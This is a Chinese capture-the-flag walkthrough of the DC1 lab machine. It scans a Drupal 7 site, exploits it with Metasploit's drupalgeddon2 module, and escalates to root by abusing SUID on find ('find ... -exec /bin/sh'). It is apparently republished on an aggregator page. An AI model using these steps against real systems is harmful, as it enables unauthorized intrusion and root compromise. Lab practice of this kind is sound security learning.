zoukankan
html css js c++ java
DC1
1.收集信息
cms信息 使用的是Drupal的cms
端口信息 开开启了22端口,80端口,111端口
目录信息 扫到敏感目录
http://192.168.0.119/robots.txt
通过cewl收集敏感信息并生成字典
cewl http://192.168.0.119 -w passwd.txt
2.漏洞分析与利用
通过robots.txt查看敏感目录内容获取中重要信息
可以从uprgade.txt看出,使用的cms是版本为7.x的Drupal
搜索相关漏洞
进入msfconsle ——> search Drupal
尝试使用最新的,rank为execllent的payload: exploit/unix/webapp/drupal_drupalgeddon2
使用该payload后查看目标是否在可攻击版本范围内
设置攻击目标,得到session会话
3.尝试提权
内核作为最后杀招不得已再用。首先联想到常见几种提权方式,suid提权
python -c 'import pty;pty.spawn("/bin/bash")' #利用python的pty获得一个完整的tty
find / -perm -u=s -type f 2>/dev/null #将有suid权限的打印出来
发现常用于usid提权的工具find
cd /tmp #切换到tmp目录下
touch luojun #创建lj文件
find luojun -exec "whoami" ; #查询lj文件并执行whoami命令
成功发现执行命令的是root权限
find luojun -exec "/bin/bash" ; #将bash的shell反弹出来,发现失败了
find luojun -exec "/bin/sh" ; #将sh的shell反弹出来,发现成功,获得root权限
提权成功,接下来任意妄为寻找flag
查看全文
相关阅读:
SpringBoot整合dubbo2.7.12
linux安装zookeeper
javaassist创建对象
jmeter websocket
jmeter使用
jmeter返回值乱码
HTTP 头 Connection:close 作用 和 解决服务器产生大量close_wait问题
服务器TCP连接中 TIME_WAIT 状态过多
Chrome 浏览器远程调试 【转】
拼多多聊天记录监控、拼多多客服机器人代码、拼多多智能机器人代码、拼多多自动发货、拼多多虚拟卡号自动发货
原文地址:https://www.cnblogs.com/sup3rman/p/12389296.html
最新文章
Element 文档中的 Markdown 解析
记一次.net mvc中 RouteAttribute 不起作用
在Windows中使用netsh命令进行端口转发
文件上传漏洞全面渗透姿势总结
C#使用Selenium+PhantomJS抓取数据
Asp.NET Core 限流控制-AspNetCoreRateLimit
chrome使用技巧
.net core在centOS Linux环境下使用HttpClient请求https失败的解决方法
mysql如何实现记录存在的话就更新,如果记录不存在的话就插入。很简单、但是很实用
mysql 处理主键重复
热门文章
linux系列-使用阿里云部署项目笔记
MacBookPro 中查看CPU 的温度和风扇的转速
线程绑定到指定CPU
JDBC操作数据封装Java Bean
对比Java源码、字节、汇编
PowerShell 常用命令
wireshark抓三次握手包
字幕文件时间偏移
REDIS有序集合类型SORT SET
jmeter压测dubbo接口
Copyright © 2011-2022 走看看